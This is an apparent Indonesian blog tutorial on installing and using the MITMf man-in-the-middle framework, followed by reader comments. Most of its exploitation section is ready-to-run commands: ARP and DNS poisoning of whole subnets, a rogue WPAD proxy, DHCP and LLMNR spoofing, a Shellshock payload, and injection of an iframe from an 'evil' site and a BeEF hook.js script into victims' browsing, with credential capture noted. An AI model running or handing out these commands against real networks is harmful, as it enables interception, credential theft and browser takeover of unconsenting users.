MITMf merupakan sebuah tools penetration testing yang fungsinya untuk serangan Man-In-The-Middle attack.

Kerangka kerja ini berisi built-in SMB, HTTP dan DNS server yang dapat dikendalikan dan digunakan oleh berbagai plugin, itu juga berisi versi modifikasi dari proxy SSLStrip yang memungkinkan untuk HTTP modifikasi dan HSTS memotong parsial.
Pada versi 0.9.8, MITMf mendukung penyaringan paket aktif dan manipulasi (pada dasarnya apa yang etterfilters lakukan, hanya lebih baik), yang memungkinkan pengguna untuk mengubah jenis lalu lintas atau protokol.
File konfigurasi dapat diedit on-the-fly sementara MITMf berjalan, perubahan akan diturunkan melalui kerangka: ini memungkinkan Kamu untuk men-tweak pengaturan plugin dan server saat melakukan serangan.
MITMf akan menangkap FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (string masyarakat), NTLMv1/v2 (semua protokol didukung seperti HTTP, SMB, LDAP dll) dan kredensial Kerberos dengan menggunakan Net-creds, yang berjalan pada memulai. sumber: Mitmf
Installasi
root# apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
Kemudian juga jalankan script berikut di terminal
root# git clone https://github.com/byt3bl33d3r/MITMf
Kemudian masuk ke directory tempat filenya berada dengan cara jalankan perintah di bawah
root# cd MITMf && git submodule init && git submodule update --recursive
Sebelum memulai installasi hendaknya kita harus berada pada mode super user kemudian install
root# pip install -r requirements.txt
Succses!! tools Mitmf sudah terinstall

Documentasi Exploitasi
root# python mitmf.py -i enp3s0
ARP meracuni seluruh subnet dengan gateway di 192.168.1.1 menggunakan plugin Spoof
root# python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1
Sama seperti di atas + server proxy WPAD nakal menggunakan plugin Responder
root# python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad
Racuni Arp 192.168.1.16-45 dan 192.168.0.1/24 dengan gateway di 192.168.1.1
root# python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1
Aktifkan DNS spoofing dan racuni ARP (Domain untuk menipu ditarik dari file config)
root# python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1
Aktifkan LLMNR / NBTNS / mDNS spoofing
root# python mitmf.py -i enp3s0 --responder --wredir --nbtns
Aktifkan DHCP spoofing (ip kolam renang dan subnet ditarik dari file config)
root# python mitmf.py -i enp3s0 --spoof --dhcp
Sama seperti di atas dengan muatan SHELLSHOCK yang akan dijalankan jika ada klien yang rentan
root# python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'
Menyuntikkan iFrame HTML menggunakan plugin Inject
root# python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com
Menyuntikkan skrip JS
root# python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js
Itulah contoh installasi dan dasar exploitasi tools mitmf di linux sytem, Ingat!! gunakan dengan bijak.
4 Komentar
mantap gan penjelasannya sangat bermanfaat
Balasane share gan
Balasoke gan sama-sama
Balasoke sippp monggo
BalasPenulisan markup di komentar